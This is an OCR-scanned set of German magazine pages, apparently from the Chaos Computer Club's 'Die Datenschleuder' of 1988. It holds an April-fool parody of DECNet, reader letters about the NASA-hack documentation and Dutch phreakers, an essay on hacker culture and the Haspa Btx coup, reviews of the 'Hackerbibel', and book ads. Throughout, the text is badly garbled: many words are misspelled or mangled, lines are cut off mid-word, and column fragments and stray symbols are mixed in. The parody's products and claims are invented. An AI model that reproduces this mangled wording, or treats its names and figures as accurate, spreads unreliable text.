keiten des Super-Hyper-WangNet werden für das
Büro der Zukunft von entscheidender Bedeutung
sein“. Bestellungen für das Super-Hyper-WangNet
werden ab nächstem Monat angenommen. Installa¬
tionen haben bereits weltweit begonnen.
Die IBM-Corpoiation, die ein Local Area Network
gerüchleweiseseit 1980 ankündigt, warnicht bereit,
dazu einen Kommentar abzugeben.
DECNet Phase XVIII
TEWKSBURY, MA; April 1,2010-Digital Equip¬
ment stellte heute ihre neue DECNet Phase XVIII-
Architekturvor. AlsEnigegnungaufEniwickiungen
von Xerox und EtherNet-Erweiterungen von Wang,
durch die man Leute und Sachen über Internode-
Links verschicken kann, bieiet auch DEC’s neuestes
DECNet diese Features, und darüber hinaus die
Erzeugung virtueller Möglichkeiten bis hin zu vir¬
tuellen Nationalstaaten. Diese Dinge wurden er¬
reichbar, nachdem Durchbrüche in der
Kommunikations-Technologie erzielt wurden, die
den Äther als Kommunikationsmedium benutzen.
Durch die Anwendung eines neuen NANO-PDP-
11/E99 Gateway Ifroccssor Systems, ETHERGATE
genannt, können DECNet-User nun an jede belie¬
bige Stelle der ElheReal-Ebenc gelangen.
Diese Entwicklung macht Telekonferenzen obsolet,
da Gruppen nun ihre eigenen Konferenzräume und
Cafeterias generieren können, was wiederum eine
Ersparnis an Platz, Reisekosten und Essens-Spesen
nach sich zieht. In der ersten Version befinden sich
möglicherweise noch einige Bugs, da eines der er¬
sten verschickten Mitglieder der DECNet Reviev
Group seit dem letzten Treffen, das in einem solchen
virtuellen Konferenzbereich abgehalten wurde,
nicht mehr aufzufinden ist.
Dieser technische Durchbruch ist einem Team von
Software- und Hardware-Ingenieuren von Distri-
buled Systems zu verdanken, die die Möglichkeiten,
die ihnen in Tewksbury, Massachusels, zur Verfü-
sung stehen, geschickt zu nutzen wußten. Distri-
Satenädjltuier
buied Systems hat einen Kompromiß gemacht und
will ETHERGATE in TWOOO unterstützen, wobei
es sich um eine Direktverbindung zu ihrem neuen
Sitz irgendwo im Bereich ihrer neudefinienen
Middle-Eanh-Realität handelt. Einige Schwierig¬
keiten gibt es, da die Relokation von Szenen, Fen¬
stern. manipulierter Steuer-Belege. Schwimmbec¬
ken undTennisplätze den Ablauf verlangsamen. Der
Aufbau der Netzwerk-Topologie bleibt unverändert,
alles ’Fonvarding’ wird vom TWOOO-EtheReal-
Ebenen-Router erledigt, der sich in dem Krater am
Ort des ehemaligen Haupisitzes befindet.
Utility Packages wie EiheReal Person Transfer (EPI)
und EtheReal Facility Transfer (EFT) bieten um¬
fangreiche Möglichkeiten für unterschiedlichsle Be¬
nutzer. Raffinierte User können auf einfache Weise
vermittels höherer Programmiersprachen ElheReal-
Entiläten generieren (SCREATE), öffnen ($OPEN)
und löschen (SNUKE), indem sie das EtheReal Ma¬
nagement System (EMS) und das EtheReal Access
Protocol (ERP) benutzen. Ein ETHERTRIEVE-
Utility zum einfachen interaktiven Gebrauch wird in
Kürze zur Verfügung stehen.
DECNet Phase XVIII ist aus der Phase-XVI-
Akzeptanz hervorgegangen, durch die jedermann
Zugang zu einem professionellen Digital-
Armband-Compuiererhalten hat, und führte überdie
erfolgreiche Architektur der gegenwänigen Phase
XVII, welche Routing-Kapazitäten bieiet. die eine
direkte Kontmunikation mit den Aiari-Videospielen
der gesamten Erdbevölkemng ermöglicht.
Die Ingenieure von Distributed Systems sind schwer
beschäftigt mit der nächsten Phase des DECNet. die
unter anderem Multi-Plane Existence Network Ma¬
nagement (unter Verwendung des NIECE-
Proiokolls) und Galaxy Level Routing mit 64K Bit
Adressbreiic bieten soll.
Digital will seine Gateway-Produkte auch weiterhin
auf der primären materiellen Ebene anbieten. Diese
Produkte enthalten ein lBM-ANA-(Acronym-
Based Network Aiciteclure)-Gatcway, außerdem
TOLKIEN, das die Kontrolle über sämtliche ring¬
förmigen Netzwerke erlaubt, und mega-breite Jump-
Band-Hardware, die auch den jüngsten Produkten
von Wang ihr angemessenes Plätzchen im Markt
zuweisen werden.
Michael Finken, BS2000 Postmasfer
Übersetzung Ins Deutsche: Poelronic
Sehe 18
Söite 19
Nasa-Hack
Daten raus umsonst
und sofort!
Unverschämtheit! Der CCC fordert seit langem
die ominöse „Freedom of Information“. Anstatt
mit gutem Beispiel voranzugehen, zockt er der
(meistens armen) Hackerbasis einen Hunni für
die Dokumentation des NASA-Hacks ab. Infor¬
mation also nur für die, die sich’s leisten können
(Presse, Bullen, VS etc.).
Damit keine Mißverständnisse aufkommen: Wir ha¬
ben nichts dagegen, wenn Ihr versucht, eure Kosten
wenigstens teilweise wieder reinzubekommen.
NUR: zockt die Kohle gefälligst denen ab, die sie
haben! Also z.B. DEC. den SPANNET-Betreibem,
IBM, Gorbi oder sonstwem. Wir fordern also:
Sofort die gesamte Dokumentation des NASA-Hacks
in einen öffentlich zugänglichen Teil der CLINCH-
Mailbox!
Wer Freiheit der Information fordert und seiner
eigenen Basis Kohle abnimmt, macht sich UN¬
GLAUBWÜRDIG. Ihr denkt kommerzieller als die
großen Kommunikationsdealer wie Benelsmann.
Im Übrigen: bildet euch nicht ein, von nichts und
niemanden abhängig zu sein. Auch ihr seid auf die
Kooperationsbereitschaft der ,,Szene“ oder „Basis“
angewiesen. Wenn ihr euch weiter so verhaltet, ist es
Essig damit. Daten raus, zack, zack!
(für die CLINCH-Mailbox ist das Zeug wohl zuviel
Müll auf einem Haufen, der Sätzer)
Die Bildschimschänder,
Sektion Passau
CCC87ICCCONGRESSICONGRESSI28.12.87121:3911184 Z.
Wenn unzustellbar
Anschriftenausschnitt b
mit neuer Adresse zurüc
Hallo Sysop,
Wir wollen gerene informationen tauschen. In di
Niederlande gibt es ein hackverein, dass ihre mi;
glieder communicieren lasst durch ein bbs System i
amsterdam. wir sind sehr interessien was der CO
vom holländishe hacker weist, und wir wollen ger
korrespondieren mit die CCC. verzeihe wen was ic
schreibe nicht richtig Deutsch ist. Ich bin ja ei
Hollender. Bitte schreibe an die holländische hackei
postfach 12894, 1100 AW Amsterdam. Die Nie
derlande.
Wir hoffen auf eine gute Zusammenarbeit.
' P.S: wir hacken diverse Systeme und sind beschäftig
mit datex und phreaking. auch die sociale a.spektei
von computermisbrauch ist unseres thema.
CUNCH/SYSOP/GASTI18.01.88120:441651 Z.
Impressum t
Die Datenschleuder™
Das wissenschaftliche Fachblati
für Datenreisende
Ein Organ des ©haos ©omputer ©lub e.V
Nummer 25 Masrz 1988
Schwenckesuaße 85 D-2(XX) Hamburg 20
Tel.: (040) 490 37 57
f. Presse; (040) 48 37 52
BTX: *CHAOS#
Clinch/Geol; Chaos-Team
Herausgeber: ©haos ©omputer ©lub e.V
ViSdP; Reinhard Schrutzki
Mitarbeiter (u.a.); DDT, A. Eichler, P. Franck
Herwart Holland-Moritz, JWI.H. Kppke, M. Kühn,
Andy M.-M., J. Nicolas, Rudolf Schrutzki, padelu’un
Poetronic, S. Stahl, S. Wemery.S . Weirauch
Nachdruck für nichtgewerbliche Zwecke
bei Quellenangabe erlaubt.
Layout &Grahk; Streßtop Publishing
Satz; BuchMaschine
Unterdrück im Selbst verlach.
Seite 20
Die Gedanken sind frei
aber wie steht’s mit den Daten?
Computer-Hacker - kriminelle Mutanten, elektronische Robin Hoods
oder ein wichtiges Informationsregulativ?
Von Werner Pieper
Jede qeue Technologie stößt bei den einen auf Ablehnung, be! den andern auf
Zustimmung und von einer dritten Gruppe wird sie als Herausforderung ange¬
nommen. Bei den Computern ist's genauso. Während eine recht große Bevölke¬
rungsgruppe zwischen Bedenken und Angst schwankt, während viele einen
neuen Arbeitspiatz am Monitor gefunden haben, gibt es auch jene, die mehr wis-
senl wollen. Hatte es vor Jahren noch den Anschein, als ob das Informations-
Zeitalter den Bürgerin Form des .Großen Bruders' bedrohen würde, so hat sich
das BHd verändert. .High Tech' ist nun etwas, mit dem der Konsument arbeitet
und spielt, Millionen arbeiten dazentralisieii an Ihren Personal-Computern, die
große Angst vor allmächtigen Supercomputem die alles zentrallslaren Ist vorbei.
Dank der Hacker.
In Deutschland sind sie spätestens
seit dem „Haspa Coup“ ein Begriff. Der
Hamburger Chaos Computer Club
wollte beweisen, daß das Btx-System
nicht so sicher sei, wie es die Betreiber
behaupteten. Über Nacht ließen sie
sich von der Hamburger Sparkassse
130 000 DM auf Ihr Konto ü^rweisen,
indem sie die Haspa dazu brachten,
alle paar' Sekunden eine Btx-Seite des
Clubs abzurufen und das zu einem Sei¬
tenpreis von 9,97 DM, Dementis der
Post und der Bank waren zwecklos,
Strafanzeigen ebenso. Denn die Hak-
ker hatten das Geld nicht heimlich stiU
und leise verpraßt, sondern den Coup
unter Aufsicht des Datenschutzbeaui-
tragten durchgeführt. Es ging ihnen
nicht um das Geld, sie wollten nur be¬
weisen, daß es mit der Systemsicher¬
heit nicht weit her war. Die Medien
hatten neue Lieblinge, Vor-Hacker Dr.
Wau trat gar bei Frank Elsner’s „Leu¬
te ’Sd“ auf und Btx wurde für den Be¬
treiber ein Reinfall, Eine neue Techno¬
logie hatte den Test nicht bestanden. '
Natürlich führt die Bundespost auf
Grund dieser Erfahrungen Jmderun-
gen und Verbesserungen des Systems
durch. Bei den Hackern hat sie sich
bislang aber für diese Anregimgen
noch nicht bedankt, dabei wäre sie
vielleicht gut damit traten, dem CCC
gut dotierte Beraterverträge anzubie¬
ten. Es ist ja schon ein paradoxes
Spiel: die von Hackern entdeckten Lö¬
cher im Sy^m Werden natürlich von
den Betreibem/Herstellem ^ schnell¬
stens gestopft So sorgen' Hacker,
wenn auch indirekt, für sicherere Sy¬
steme um anschließend zu Buh-Mäh-
netn gestempelt zu werden. ^Im Bild¬
schirmtext geht das Spiel noch weiter
dort wirbt die Bundespost sogar mit
einem der Paradepferde des CCC. Btx
ist eigentlich nur für StandbUder ge¬
eignet Der CCC hat j^och solange
daran herumgetüftelt bis es gelungen
ist einen regelrechten ;,Z^ehMtrickf
film“ zu programrniereji.'Eind'Oeispiefe
lose Leistung. Potentiellen neuen Btx
Kunden wird nun von der Post eben
dieser Film vorgespielt um äirbuzei-
gen, wozu diöses System in der Lage
ist, Thema des Filmes: ein „Chaos Mo¬
bil“ schießt hier mit „Nuki-Bomben“
auf den „Gilb" in Form von kleinen gel¬
ben Posthörnchen
Was soll das?
Worum geht es diesen Hackern
überhaupt? Hier eine kleine Selbstdar¬
stellung:
„Wir sind unbequem und legen, wie
die Post sagt atypisches Nutzeryerhal-
ten an den Tag (oder die Nacht), Wir
meinen: das ist nötig. Je steriler un¬
sere Umwelt wird, desto notwendiger
ist es, Leben bineinzubringen. Ange¬
fangen hat es mit der Gründung des
Chaos Computer Qubs vor rund vier
Jahren. Der nächste entscheidende
Schritt war das Erscheinen der Daten¬
schleuder und die Pflege von elektroni¬
schen Informationsdiensten wie Btx
und den Schwarzen Brettern in Mehl¬
boxen und BuUetten Bords bis hin zum
Chaos Communication Congress. Über
die Datennetze wurden weltweite Kon¬
takte geknüpft, Informationen und An¬
sichten ausgetauscht und diskutiert
Es bildete sich ein Kreis, eine Gemein¬
schaft ein loser Haufen von Leuten
aus den verschiedensten Richtungen,
die über Perspektiven, Möglichkeiten,
aber auch Gefahren der vielfältigen
Verwendung neuer Technologien und
deren Auswirkungen nachzudenken
begannen.“
Ursprüngüch kam der Begriff Hak-
ker aus Amerika. Dort hatten sich
schon vor Jahren am Massachusetts
Institute of Technologie Leute nachts
in die stillgelegten Computer „ge¬
hackt" um ungestört arbeiten zu kön¬
nen. Daruih geht es ja häufig
Hacken: wie kommt man in große
Rechner um Arbeiten ausführen zu
können, zu denen die Leistungskraft
des eigenen PC nicht ausreicht. Da¬
durch wird niemand direkt geschädigt
D. h., man ist gerade dabei sich zu
überlegen, wie man solchen „Zeitdieb¬
stahl“ ahnden kann und soll. Das Hak-
kerwesen hat seine Wurzeln in den
wilden 60er Jahren. Eine Subkultur,
hat überlebt und blüht jetzt erst richtig
auf. Hacker haben Macht, wobei sie
der Macht mißtrauischer gegenüber¬
stehen als andere. Hacker sind häufig
Einzelkämpfer, aber als Gruppe ver¬
schmelzen sie schnell zu einer Einheit
Es gibt' kaum Frauen unter ihnen,
mehr schüchterne, picklige Jungs, die
beim Sport in der Schule oder auch in
der Disco nie in der ersten Reihe stan¬
den, aber jetzt „ihr Dingen“ gefunden
haben; Ihre Sprache ist neu imd für
Normalbürger kaum verständlich. Sie
reden ln Kürzeln und Codes, es klingt
wie neuzeitliche Poesie.
Hacker sind keine Crasher
Bei einem Hacker-Treffen in den
USA trafen sich auch altgestandene
Computer-Cracks wieder, z. B. Steve
Wozsnlak, der Begründer von Apple
Computer. Nach wie vor ist es mehr
das Abenteuer Computer das ihn reizt,
nicht die Vermarktung, nicht der Auf-
sicbtsrat-Job in einer Weltfirma. Ein¬
mal ist es derselbe alte Forschergeist,
der ihn beseelt; zum anderen auch die
Sorge um Mißbrauch der von ihm ent¬
wickelten Maschinen, wobei sich der
Begriff „Mißbrauch“ unterschiedlich
definieren läßt Hacker sind keine
Crasher. Crasher steigen in fremde
Computersysteme ein und vernichten.
Crasher sind destruktiv. Die Hacker
sind die guten Helden der Computer-
Revolutioa Sie haben sogar ihre ei¬
gene Ethik entwickelt
„1. Zugang zu Computern und allem,
wes Dich etwas über die Welt lehrt,
sollte unbegrenzt seiii. 2. SümtUche In¬
formationen sollten frei sein. 3. Mi߬
traue der Autorität — fördere Dezen-
trsiUsatioa 4. Hacker sollten auf Grund
ihrer Fähigkeiten beurteilt werden,
nicht auf Grund von akademischen
Rängen, ihrem Alter, ihrer Rasse etc.
5. Du kannst mit Hilfe des Computers
Kunst und Schönheit erzeugen.
6. Computer können Dein Leben ver¬
bessern.“ (Steven Levy)
Computer können das Leben verbes¬
sern, sie müssen es aber nicht unbe-
üBngt Jls kohlte* lolMBrlichiädeh
an, was man unter einem „verbesser-
ten Leben“ versteht. So schildert ein
überzeugter Computer-Arbeiter seine
Situation:
„Seit fünf Jahren arbeite ich mit
Computern, seit zwei Jahren besitze
ich einen. Meine mentalen Gewohn¬
heiten haben sich verändert. Ich be¬
merke drei dominierende Veränderun¬
gen: Ich arbeite schneller, aber habe
das Gefühl keine Kontrolle über meine
Zeit zu haben. Ich spiele mit neuen Ty¬
pen kreativer Maschinen, habe aber
keine Ahnung, wie ich sie beurteilen
soll. Ich arbeite effektiver und spare
Zeit, verplempere sie aber wieder beim
Durchforsten von unbezwingbaren
Bergen von Druckinformationen über
Computer und die Computerindu¬
strie.'*
Verändertes Zeitgefühl
So geht es vielen Hackern: die sozia¬
len Kontakte schrumpfen, das Zeitge¬
fühl verändert sich, eine Art Suchtver¬
halten stellt sich ein; ein legales Sucht¬
verhalten, ohne daü es bei der Droge
Nachschubschwierigkeiten gibt
Für i mm er neue Anregimgen sorgt
das Vereinsorgan des Chaos Computer
Club, dis „Datenschieuder“, ein regel¬
mäßig erscheinendes Fachblatt, das
für den Laien viele kodierte Geheim¬
nisse enthält Rir den Fachmann für
Datenfernübertragungen zur Pflieht-
lektüre gehört; Hacker wie für
Postler. Der CCC hat auch ein dickes
Buch herausgegeben, die „Hackerbi-
bel“, eine grundlegende Sammlung
von Beiträgen von und über Hacker.
Um diese Publikationen verstehen zu
können, erfordert es schon einiges an
Englisehkenntnlssen und ein wenig
Fachwissen wird auch vorausgesetzt
In diesen Publikationen finden sich
keine Anleitungen, wo man sich wie in
andere Systeme „einhacken“ kann,
sondern mehr theoretischer Unterbau:
wozu das alles gut ist oder sein soll
oder sein kann.
Da gibt es z. B. die Geschichte der
Europaparlamentarier, denen in Lu¬
xemburg eine Rechenanlage zur Ver-
fügimg steht, in der alle Daten über die
europäischen Länder gespeichert sind.
Der Haken; jeder Parlamentarier
kann nur die Daten seines eigenen
Landes abrufen. So ist es nicht ver¬
wunderlich, daß anläßlich der High-
Tech-Woche in Straflburg das Informa¬
tionsbüro des CCC von Europapärlä-
men tariern überl aufen wurd e. Da s
Büro war den CCCiern von den euro¬
päischen Grünen zur Verfügung ge¬
stellt worden. Auch das ist erstaunlich;
während der Anhängerschaft der Grü¬
nen im Allgemeinen Technikfeindlich¬
keit vorgeworfen wird, arbeiten sie in
der Tat an einer Demokratisierung der
Daten. In Bonn erregte MdB Herbert
Rusche letzthin Aufsehen, als er einen
Antrag auf Btx für sein Büro stellte.
Damit hatte man nicht gerechnet, auch,
wenn Rusche stellvertretend im Post-
ausscbuß sitzt
DAS PARLAMENT
Nr. 32 / 9. August 1986
Chdos Computer Club
KäBELSALat
«SESUMp;
oatem
»
Freiheit für Daten
Grüne und Hacker haben Gemein¬
samkeiten; beide geben sich mit vorge¬
gebenen Realitäten nicht zufrieden,
beiden geht es um eine Demokratisie¬
rung des Lebens und der Daten, die
immer mehr lebenswichtige Entschei¬
dungen beeinflussen. Wie elektroni¬
sche Robin Hoods befreien die Hacker
Daten und geben sie dem Volke. Das
peueste Projekt: man will sich xücht
damit abfinden. daß Radioaktivitats-
werte Regierungssache sind. Also ver¬
sucht man, sich in die entsprechenden
Informationsquellen einzuhacken und
parallel dazu ein alternatives Meßnetz
zu knüpfen, damit man zukünftig nicht
mehr auf die umstrittene Informa¬
tionspolitik in Krisenfällen angewie¬
sen ist. Die aktuellsten Informationen
über Strahlungen nach Tschernobyl
fanden sich nicht in den Zeitungen,
sondern in der Mail Box.
Jedes Jahr zwischen Weihnachten
und Neujahr trifft sich die Hacker-
Szene beim großen „Chaos Congress“
in Hamburg. Viele die sich bislang nur
auf. elektronischer Ebene kennenge-
lemt haben, begegnen sich dort erst¬
malig in Fleisch und Blut Da werden
aus Nummern, Codes und Paßwörtern
richtige Menschen. Gerade im Um¬
gang mit heiklen Daten ist es doch
sehr wichtig zu wissen, mit wem man
es zu tun hat Vor dem Monitor sind
alle gleich, dem Computer ist es egal,
ob der Bediener Mann oder Fräu, Kind
oder Greis, schwarz oder weiß ist Die
Kongreßzeit ist wohl gewählt in den
Rauhnächten trafen sich schon unsere
Altvorderen tun sich die wunderlich¬
sten Geschichten zu erzählen. Das ist
gelebter, radikaler TraditionaUsmus.
Inzwischen hat sich der Chaos Con¬
gress zu einem Elreignis europäischen
Formats entwickelt Hacker gibt es
zwar überall, aber so chaotisch und
trotzdem effektiv organisiert sind sie
nur in der Bundesrepublik Deutsch¬
land.
Diese Informationspiraten werden
uns erhalten blfeibdn, solange es elek¬
tronische Medien gibt das hegt in der
Natur der Sache. Da helf eh keine Kla¬
gen, keine Gesetze, keine elektroni¬
sche Datensicherung. Dem Bürger, der
ohnmächtig wie der Ochs vorm Berg
vor dem Computerzeitalter steht mag
es recht sein, kann er sich doch in den
meisten Fällen einer gewissen Sympa¬
thie für diese Leute nicht verkneifen
Kein Wunder, daß sich auch Holly¬
wood schon des Hacker-Themas ange¬
nommen hat denn Hacker-Geschich¬
ten sind der Stoff zeitgemäßer Legen¬
den. Ein wahrhaft klassisches Thema:
den Großen wird eins ausgewischt der
kleine Mann freut sich. A
■ tSUIK ^ 5 4!^ ö * ® /
I
HACKERBIBEL
Chaos Computer Club
0»
c
1/1
Q.
(D
00
o
t/1
(/)
I
CO
o
3
3
Die erste „Hacker¬
bibel des CCC“
CCC - das Isl kein unbekann¬
tes Küael eines Insiderkreises
mehr, seit Herwart Holland und
sein „Chaos Computer-Club" im
letzten Jahr die Hamburger Spar¬
kasse mittels Btx über Nacht um
säte 135 000 DM erleichtert hat¬
te. Das Schlagwort vom „Robln
Hood im Datennetz“ machte da¬
mals allerorten die Runde.
Der Chaos Computer Club,
Schwarz-Schillings unbequem¬
stes Kind, das „atypisches Nutz-
verhalten“ an den Tag bzw. die
Nacht legt, wurde vor vier Jahren
in den Räumen der TAZ gegrün¬
det.
Die Aktivitäten der ,.galakti¬
schen Vereinigung ohne feste
Strukturen“ (CCC über sich
selbst) wie etwa die Verbreitung
von Bauanleitungen bzw. Bau¬
sätzen von Modems, Strichcode-
lesern u.ä., die Gründung von
Datenbanken, der Zugriff und die
Verknüpfung von Rechnernet¬
zen, die internationale Zusam¬
menarbeit mit Computernetz¬
werken sowie die Herausgabe
der Zeitschrift „Die Datenschleu¬
der" haben diesem lockeren Ver¬
ein wenig Sympathien bei Com¬
puterfirmen wie bei der Post ein¬
getragen.
Dabei ist das von der „Grünen
Kraft - Medienexperimente"
verlegte Buch nicht nur für jene
Zeitgenossen interessant, die ih¬
ren Farblernseher in ein High-
Tech-Terminal-Tabernakel ver¬
wandelt haben und die V/elt aus
Immer rot unterlaufenen, über-
nächllgten Pupillen betrachten.
sondern es ist auch für den inter¬
essierten, aber' ahnungslosen
Laien informativ.
Dies liegt an der Konzeption
des Buches als einerseits um¬
fangreiche Sammlung von Bau¬
anleitungen für Modems, Sohalt-
plänen, Funkdienst- und anderen
Verzeichnissen (Seriai-Norm-
Nummern) sowie ,,Hacker-Tips"
allgemeinerer Art. An die heran¬
zukommen Ist normalerweise
sehr schwer, weil sich der
Hacker-Alltag meist an der Gren¬
ze der Legalität bewegt.
Andererseits Ist das Buch
auch eine Dokumentation der
Geschichte des „Hackings", die
sich aus Artikeln verschiedener
Zeitungen, aus Kongressberich¬
ten und aus Aufsätzen mit Them-
ne wie etwa „Computer für Nica¬
ragua“, Computerkriminalität,
„Computer &. the Totalitarian
State" u.a. mehr puzzleailig zu-
sammensetzen läßt.
Das Buch zeigt damit auch
dem „nur" politisch interessier¬
ten die Gefahren und Möglich¬
keiten der neuen Technologien.
Der CCC zeigt mit seiner prakti¬
schen Arbeit, wie man den Über¬
wachungsstaat mit seinen eige¬
nen Mitteln schlagen kann.
Die Hackerbibel Teil II isl
schon in der Mache; wer Lust
hat, sich daran zu beteiligeti,
kann seine „Tips und Tricks mit
Btx" (auch anonym) an das
Chaos-Team schicken: CCC,
Schwenckestraße 85, 2000 Ham¬
burg.
Die Hackerbibel, Chaos Compu'
lor Club, Verlag Grüne Kf®*'’
Medienexperimente, 260 S.,
33,33 DM
Die Hackerbibel
CCC (Herausgeber)
Grüne Kraft 1985
259 Selten, DM 33,33 datawelti/86
Auf der Buchmesse habe ich es ent¬
deckt: Das erste Buch vom Chaos
Computer Club (CCC). Natürlich
übers Hacken, Den CCC brauche ich
wohl kaum vorzustellen, selbst Neu¬
linge dürften schon irgendwann ein¬
mal von ihm gehört haben, späte¬
stens durch den spektakulären "Ein¬
bruch" in die BTX-Leitung einer
Bank, t/iei Jahre CCC-Geschichte, Er¬
fahrungen und Aktivitäten sind in
diesem witzig aufgemachten Buch
enthalten. Gemäß der CCC-Maxime
"jeder sollte unzensiert Informatio¬
nen austauschen können" beinhaltet
die HACKERBIBEL Zeitungsaus¬
schnitte. Reportagen, Bauanleitun¬
gen. Cartoons und Faksimiles von
Zeitschriften aus der Welt des Hak¬
king. Eine bunte Mischung geballter
Informationen, allerdings unüber¬
sichtlich und teilweise recht schwer
leserlich; vor allem, wenn man der
englischen Sprache nicht mächtig ist.
Eine Menge wichtiger Artikel und
Faksimiles sind aus der englischen
Originalausgabe abgedruckt.
CHAOS-COMPUTER¬
CLUB IHrsg.)
Die Hackerbibel
(Der (•rünc 98, 257 SvUi-n.
DM 3X50
W AS zeichnei eine Sub-
KuUur aus? DalJ sic eine
Codc-Spr.iclie sprichl. die niclil
jeder versieht. Was zeichnet die
Bibel aus? Man muß dran
glauben . . .
In unseren an konturierleii
Revolten armen Zeiten isl das
Bedürfnis nach aursliindischen
Helden groß. Aber alle lieben
Greenpeace. Bleiben nur die
Hacker: Schließlich fummeln
sie für uns digitale Analphabe¬
ten in den Chips der Mächti¬
gen herum.
Nun hat der durch das
Knacken von Sparkassenkenn-
wörlern berühmt gewordene
Hamburger Chaos-Compuler-
Club seine fette „Hackerbibel“
verlegen lassen. Worum es den
Hackern geht? Um „freien Zu¬
gang zu allen Daten“.
Hier wird es amüsant-
brisant. Denn dieser Stand¬
punkt widerspricht konträr der
Lieber-nicht-Haltung kritischer
und alternativer Provinienz.
Die sähe nur zu gern nitissive
Vorhängeschlösser an den Da¬
tenbanken und verlagert mit
Datenschutz und Technikskep¬
sis auch das letzte Quanlum
Verantwortung zu den Bits-
Technokraten.
Die Hacker wissen das. Und
so ärgern sie nicht nur Post und
Siemens, sondern auch die un¬
bedarfte „Scene“. Wer als Laie
das Buch sichlet, wird es nicht
kaufen. Über zwei Drittel be¬
stehen aus Fachtips und Tricks
zum Löten und Codieren. Es
wimmelt von Expertenkürzeln,
eine Sprache, die nur Hacker
und ihre intimen Feinde auf
der anderen Seite des Moni¬
tors verstehen. Der Kampf um
die Verfügungsgewalt über die
neue Technologie ist nicht Für
jeden überschaubar.
Ersiaunlicherweise sind die
ästhetischen Formen jedoch
tradiert: aus Alternativzeitun¬
gen der ersten Generation,
kreuz und quer layoulet -
Chaos komplett. Und fast die
Hälfte ist in Englisch.
Trotzdem sind viele Erklä¬
rungen zu dieser Mischungaus
Spontanität. Hi-Tech-Obses-
sionen und Komniunikations-
gedusel brauchbar. Zur Selbst-
iiitcrprctation bedient sich die
bleiche und clwas diskursarme
Szene allerdings bei der mor-
TtUPO/OtZEMBtlt 1985
Medienexperimente ■ D-6941 Löhrbach
Chaos Computer Club & AK PoHtlscher Computereinsatz
DIE STUDIE
Dar Qrilna Zweig 117
Entwurf einer sozialverträglichen Gestaltungsalternative für den
geplanten Computereinsatz der Fraktion „Die Grünen im Bundes¬
tag“ unter besonderer Berücksichtigung des geplanten Modellver¬
suchs der Bundestagsverwaltung (PARLAKOM).
Auf der Basis eines im Auftrag des Bundestages erstellten
umfangreichen Planungskonzepts zur Einführung eines gemeinsa¬
men Informations- und Kommunikationssystems für das Parla¬
ment, die Fraktionen und die Wahlkreisbüros der Abgeordneten
galt es, dieses kritisch zu bewerlen und die Gestaltungsmöglich-
keüen für die Grünen im Bundestag auszuarbeiten... Die Einfüh¬
rung der Computertechnik gestaltet sich für die Grünen im Bun¬
destag so schwer wie für andere der Ausstieg aus der Atom¬
industrie. Für beide geht es an die Strukturen.
TEMPO zur Studie: „Die berüchtlgste Hacker-Gang der Republik,
der Hamburger Chaos-Computer-Club, versetzte bislang nur Big
Brother ln Angst und Schlecken. Jetzt sind die Alternativen dran:
CCC will die Bundestagsfraktion der Grünen verkabeln...“
ISBN 3-925817-17-4 7.50 DM/SFH
TRAU keiNEM COMFVTW.
OCN OU NICKT (EVI TRACEN KANNST.
J\0 FICTION
Der Grüne Zweig 62
14 Geschichten zum Thema »...als die Natur die Zukunft über¬
nahm« mit Beiträgen der besten Science Fiction Autoren; Frank
Herbert. Ursula LeGuinn, Herbert W. Franke. Jean u.a.m. Zusam¬
menstellung: Werner Pieper.
ISBN 3-922708-82-X. 160 Seiten, nur noch 5 DM/SFR
Ludmilla Tüting (Hrsg.)
MENSCHEN - BÄUME -
EROSIONEN
Kahlachiag Im HImalaya - Wege aus der Zerstärung
Der Grüne Zweig 120
Weltweit geht es Bäumen und Wäldern zunehmend schlechter.
Holzraubbau, Tourismus. Energiemißwirlschaft und Umweltver¬
schmutzung schlagen ihre Breschen.
Sei es der Raubbau in amerikanischen Regenwäldern, der Ausver¬
kauf afrikanischer Edelhölzer, rutschende Berge im Himalaya oder
das Waldsterben bei uns: überall wächst der Widerstand der
Betroffenen. In diesem Buch wird stellvertretend für alle anderen
die Situation der Menschen im Himalaya dokumentiert, wobei
besonders auf die „Chipko", die Baumumarmer, eingegangen
wird.
Themen; • Die Wälder tm Himalaya • Die Chipko-Sewegung •
Ökologie-Bewegungen in Indien • Bhutans radikale Umeltpolilik •
Hörl endlich auf, uns entwickeln zu wollen • Die Legende von der
Grünen Revolution • Als die Touristen kamen * u.a.m.
Die Autorin. Ludmilla Tüting. lebt seit 1974 wechselweise in
Kalhmandu (Nepal) und Kreuzberg (Berlin). Beides Orte, die sie
gleichermaßen faszinieren. Als engagierte Umweltjournalistin und
eine der besten Kennerinnen Nepals Ist es ihr ein Anliegen, nicht
nur Fakten und handfeste praktische Tips wetterzugeben, sie wirbt
■ auch für ein „sanftes, einfühlsames Reisen'*, von ihr sind unge¬
zählte Zeitungsartikel erschienen. Weitere Bücher: Bikas/Binas,
Kathmandu 1987, und Nepal und Tibet. 1986.
1 Dieses Buch entstand in Kooperation mit der Aktionsgemein¬
schaft Solidarische Well (ASW), Berlin.
ISBN 3-026»' 7-70 ■* 140 Seiten 13 DM/SFR
LOOMPANiCS
The Best Book Catalog In the World
Der Grüne Zweig 99
»Der definitive Katalog für den subversiven Alltag« (taz)
This catalog is an important source for anarchists. survivalists,
iconoclasts, setf-Hberators, mercßnaries, investigators, drop-outs,
researchers. and Just about anyone interasted in the Strange, the
usefui, the arcane, the oddball, the unusual. the unlQue, and the
diabolicaL
Eine unglaubliche Anpreisung von Bücherr>. die aus verschieden¬
sten Gründen hierzulande nicht vcMBteilbar ist.
Achtung: Wir verteilen nur dpn Katalog, nicht die dort angebotenen
Bücher, diese muß W\an direkt in den USA bestellen.
Katalog A4, broschiert. 150 S^en, 5.— DM/SFR
Ronald Rippchen
HEITER WEITER
Die gesammelten Kräuter-Pitlen-Drogen-
Kolumnen aus der tax
Oer Grüne Zweig 119
Jochen Blumenthal
DER ELEKTRONISCHE
KAMMERJÄGER
Erkennung von Wanzen, Spitzeln und Überwachung,
sowie Tips für Schutzmaßnahmen
Der Grüne Zweig 122
Gibt es Gründe, sich in diesem Land verfolgt zu fühlen? Wert
Telefone abgehörl? Schlösser und Codes geknackt?
Wenn ja. woran kann man die Spitzel und ihre Wanzen erkenn
was dagegen unternehmen?
Jochen Blumenthal hat sich die Mühe gemacht, Bespitzelurn
mögiichkeiten auszuloten und in einer auch für den technlsci
Laien verständlichen Sprache zu erklären. Blumenthal. Autor <
Bücher Das Große Minispion Baubuch und Computer und Abi
ren, ist ein Betroffener, hat man Ihm doch übel mitgespielt- mi
rere Razzien und Knastaufenlhalte motivierten Ihn zur gründlicf
Recherche. „Es geht mir darum. Möglichkeiten und Methoden
